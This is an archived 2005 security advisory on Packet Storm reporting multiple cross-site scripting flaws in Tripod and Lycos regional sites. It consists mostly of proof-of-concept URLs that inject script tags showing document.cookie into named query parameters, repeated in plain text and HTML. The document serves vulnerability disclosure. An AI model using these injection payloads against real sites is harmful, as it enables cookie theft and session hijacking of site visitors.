what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

tripodXSS.txt

tripodXSS.txt
Posted Mar 30, 2005
Authored by Diabolic Crab | Site hackerscenter.com

Tripod.com suffers from multiple cross site scripting flaws.

tags | exploit, xss
SHA-256 | 5e26ffe5df8029d71eaf9663f809a5b324b485a87e40fab11d05f233ebdef46e
Download | Favorite | View

tripodXSS.txt

Change Mirror Download
This is a multi-part message in MIME format.

------=_NextPart_000_0005_01C53480.E4D6FC80
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dcrab 's Security Advisory
http://icis.digitalparadox.org/~dcrab
http://www.hackerscenter.com/

Severity:  Medium
Title: Multiple xss vulnerabilities in Tripod.com
Date: March  30,  2005
Site: http://www.tripod.com

Summary:
There are multiple XSS vulnerabilities in the Tripod.com

Proof of Concept Exploit:

http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D&mrc=3D&qu=3D&query=3D=
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie


http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D&mrc=3D&qu=3D%22%3E%=
3Cscript%3Ealert(document.cookie)%3C/script%3E&query=3D1
Pops cookie


http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D&mrc=3D%22%3E%3Cscri=
pt%3Ealert(document.cookie)%3C/script%3E&qu=3D&query=3D1
Pops cookie


http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D%22%3E%3Cscript%3Eal=
ert(document.cookie)%3C/script%3E&mrc=3D&qu=3D&query=3D1
Pops cookie


http://shopping.lycos.co.uk/query.html?cat=3D%22%3E%3Cscript%3Ealert(docu=
ment.cookie)%3C/script%3E&brd=3D&mrc=3D&qu=3D&query=3D1
Pops cookie


http://webhosting.lycos.co.uk/business/compare/?compareId=3D%22%3E%3Cscri=
pt%3Ealert(document.cookie)%3C/script%3E
Pops cookie


http://webhosting.lycos.co.uk/consumer/compare/?compareId=3D"><script>ale=
rt(document.cookie)</script>
Pops cookie


http://www.multimania.lycos.fr/search/?query=3Dphp&collection=3D"><script=
>alert(document.cookie)</script>&action=3D1
Pops cookie


http://www.tripod.jubii.dk/search/?query=3Dphp&collection=3D%22%3E%3Cscri=
pt%3Ealert(document.cookie)%3C/script%3E&action=3D1
Pops cookie


http://www.tripod.lycos.co.uk/search/?query=3Dphp&collection=3D%22%3E%3Cs=
cript%3Ealert(document.cookie)%3C/script%3E&action=3D1
Pops cookie


http://www.tripod.lycos.de/search/?query=3Dphp&collection=3D%22%3E%3Cscri=
pt%3Ealert(document.cookie)%3C/script%3E&action=3D1
Pops cookie


http://www.tripod.lycos.es/search/?query=3Dphp&collection=3D%22%3E%3Cscri=
pt%3Ealert(document.cookie)%3C/script%3E&action=3D1
Pops cookie


http://www.tripod.lycos.it/search/?query=3Dphp&collection=3D%22%3E%3Cscri=
pt%3Ealert(document.cookie)%3C/script%3E&action=3D1
Pops cookie


http://www.tripod.lycos.nl/search/?query=3Dphp&collection=3D%22%3E%3Cscri=
pt%3Ealert(document.cookie)%3C/script%3E&action=3D1
Pops cookie


http://www.tripod.spray.se/search/?query=3Dphp&collection=3D%22%3E%3Cscri=
pt%3Ealert(document.cookie)%3C/script%3E&action=3D1
Pops cookie


Author:
These vulnerabilties have been found and released by Diabolic Crab, =
Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free to =
contact me regarding these vulnerabilities. You can find me at, =
http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. =
Lookout for my soon to come out book on Secure coding with php.

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com

iQA/AwUBQkk8ISZV5e8av/DUEQLZzwCg/tGlfLNPtQCbYge2oDUyRJK6RR8AoN2C
9FDhk4OgSnAljDh8yIdaJ1cj
=3DqJY/
-----END PGP SIGNATURE-----

------=_NextPart_000_0005_01C53480.E4D6FC80
Content-Type: text/html;
  charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 6.00.2900.2604" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>-----BEGIN PGP SIGNED =
MESSAGE-----<BR>Hash:=20
SHA1</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Dcrab 's Security Advisory<BR><A=20
href=3D"http://icis.digitalparadox.org/~dcrab">http://icis.digitalparadox=
.org/~dcrab</A><BR><A=20
href=3D"http://www.hackerscenter.com/">http://www.hackerscenter.com/</A><=
/FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Severity:&nbsp; Medium<BR>Title: =
Multiple xss=20
vulnerabilities in Tripod.com<BR>Date: March&nbsp; 30,&nbsp; =
2005<BR>Site: <A=20
href=3D"http://www.tripod.com">http://www.tripod.com</A></FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Summary:<BR>There are multiple XSS =
vulnerabilities=20
in the Tripod.com</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Proof of Concept Exploit:</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2><A=20
href=3D"http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D&mrc=
=3D&qu=3D&query=3D%22%3E%3Cscript%3Ealert(document.cookie)%3C/scr=
ipt%3E">http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D&mrc=
=3D&qu=3D&query=3D%22%3E%3Cscript%3Ealert(document.cookie)%3C/scr=
ipt%3E</A><BR>Pops=20
cookie</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV><FONT face=3DArial =
size=3D2>
<DIV><BR><A=20
href=3D"http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D&mrc=
=3D&qu=3D%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&qu=
ery=3D1">http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D&mr=
c=3D&qu=3D%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&q=
uery=3D1</A><BR>Pops=20
cookie</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D"http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D&mrc=
=3D%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&qu=3D&qu=
ery=3D1">http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D&mr=
c=3D%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&qu=3D&q=
uery=3D1</A><BR>Pops=20
cookie</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D"http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D%22%3E%3=
Cscript%3Ealert(document.cookie)%3C/script%3E&mrc=3D&qu=3D&qu=
ery=3D1">http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D%22%3E%=
3Cscript%3Ealert(document.cookie)%3C/script%3E&mrc=3D&qu=3D&q=
uery=3D1</A><BR>Pops=20
cookie</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D"http://shopping.lycos.co.uk/query.html?cat=3D%22%3E%3Cscript%3Eal=
ert(document.cookie)%3C/script%3E&brd=3D&mrc=3D&qu=3D&que=
ry=3D1">http://shopping.lycos.co.uk/query.html?cat=3D%22%3E%3Cscript%3Eal=
ert(document.cookie)%3C/script%3E&brd=3D&mrc=3D&qu=3D&que=
ry=3D1</A><BR>Pops=20
cookie</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D"http://webhosting.lycos.co.uk/business/compare/?compareId=3D%22%3=
E%3Cscript%3Ealert(document.cookie)%3C/script%3E">http://webhosting.lycos=
.co.uk/business/compare/?compareId=3D%22%3E%3Cscript%3Ealert(document.coo=
kie)%3C/script%3E</A><BR>Pops=20
cookie</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D'http://webhosting.lycos.co.uk/consumer/compare/?compareId=3D"><sc=
ript>alert(document.cookie)</script'>http://webhosting.lycos.co.uk/consum=
er/compare/?compareId=3D"><script>alert(document.cookie)</scr=
ipt</A>><BR>Pops=20
cookie</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D'http://www.multimania.lycos.fr/search/?query=3Dphp&collection=
=3D"><script>alert(document.cookie)</script>&action=3D1'>http://www.m=
ultimania.lycos.fr/search/?query=3Dphp&collection=3D"><script&g=
t;alert(document.cookie)</script>&action=3D1</A><BR>Pops=20
cookie</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D"http://www.tripod.jubii.dk/search/?query=3Dphp&collection=3D%=
22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=3D1">http=
://www.tripod.jubii.dk/search/?query=3Dphp&collection=3D%22%3E%3Cscri=
pt%3Ealert(document.cookie)%3C/script%3E&action=3D1</A><BR>Pops=20
cookie</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D"http://www.tripod.lycos.co.uk/search/?query=3Dphp&collection=3D=
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=3D1">htt=
p://www.tripod.lycos.co.uk/search/?query=3Dphp&collection=3D%22%3E%3C=
script%3Ealert(document.cookie)%3C/script%3E&action=3D1</A><BR>Pops=20
cookie</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D"http://www.tripod.lycos.de/search/?query=3Dphp&collection=3D%=
22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=3D1">http=
://www.tripod.lycos.de/search/?query=3Dphp&collection=3D%22%3E%3Cscri=
pt%3Ealert(document.cookie)%3C/script%3E&action=3D1</A><BR>Pops=20
cookie</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D"http://www.tripod.lycos.es/search/?query=3Dphp&collection=3D%=
22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=3D1">http=
://www.tripod.lycos.es/search/?query=3Dphp&collection=3D%22%3E%3Cscri=
pt%3Ealert(document.cookie)%3C/script%3E&action=3D1</A><BR>Pops=20
cookie</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D"http://www.tripod.lycos.it/search/?query=3Dphp&collection=3D%=
22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=3D1">http=
://www.tripod.lycos.it/search/?query=3Dphp&collection=3D%22%3E%3Cscri=
pt%3Ealert(document.cookie)%3C/script%3E&action=3D1</A><BR>Pops=20
cookie</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D"http://www.tripod.lycos.nl/search/?query=3Dphp&collection=3D%=
22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=3D1">http=
://www.tripod.lycos.nl/search/?query=3Dphp&collection=3D%22%3E%3Cscri=
pt%3Ealert(document.cookie)%3C/script%3E&action=3D1</A><BR>Pops=20
cookie</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D"http://www.tripod.spray.se/search/?query=3Dphp&collection=3D%=
22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=3D1">http=
://www.tripod.spray.se/search/?query=3Dphp&collection=3D%22%3E%3Cscri=
pt%3Ealert(document.cookie)%3C/script%3E&action=3D1</A><BR>Pops=20
cookie</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR>Author:<BR>These vulnerabilties have been found and released by =

Diabolic Crab, Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, =
please feel=20
free to contact me regarding these vulnerabilities. You can find me at, =
<A=20
href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A> =
or <A=20
href=3D"http://icis.digitalparadox.org/~dcrab">http://icis.digitalparadox=
.org/~dcrab</A>.=20
Lookout for my soon to come out book on Secure coding with php.</DIV>
<DIV>&nbsp;</DIV>
<DIV>-----BEGIN PGP SIGNATURE-----<BR>Version: PGP 8.1 - not licensed =
for=20
commercial use: <A href=3D"http://www.pgp.com">www.pgp.com</A></DIV>
<DIV>&nbsp;</DIV>
<DIV>iQA/AwUBQkk8ISZV5e8av/DUEQLZzwCg/tGlfLNPtQCbYge2oDUyRJK6RR8AoN2C<BR>=
9FDhk4OgSnAljDh8yIdaJ1cj<BR>=3DqJY/<BR>-----END=20
PGP SIGNATURE-----<BR></FONT></DIV></BODY></HTML>

------=_NextPart_000_0005_01C53480.E4D6FC80--
Login or Register to add favorites

File Archive:

March 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    13 Files
  • 3
    Mar 3rd
    15 Files
  • 4
    Mar 4th
    0 Files
  • 5
    Mar 5th
    0 Files
  • 6
    Mar 6th
    16 Files
  • 7
    Mar 7th
    31 Files
  • 8
    Mar 8th
    16 Files
  • 9
    Mar 9th
    13 Files
  • 10
    Mar 10th
    9 Files
  • 11
    Mar 11th
    0 Files
  • 12
    Mar 12th
    0 Files
  • 13
    Mar 13th
    10 Files
  • 14
    Mar 14th
    6 Files
  • 15
    Mar 15th
    17 Files
  • 16
    Mar 16th
    22 Files
  • 17
    Mar 17th
    13 Files
  • 18
    Mar 18th
    0 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    16 Files
  • 21
    Mar 21st
    13 Files
  • 22
    Mar 22nd
    5 Files
  • 23
    Mar 23rd
    6 Files
  • 24
    Mar 24th
    47 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close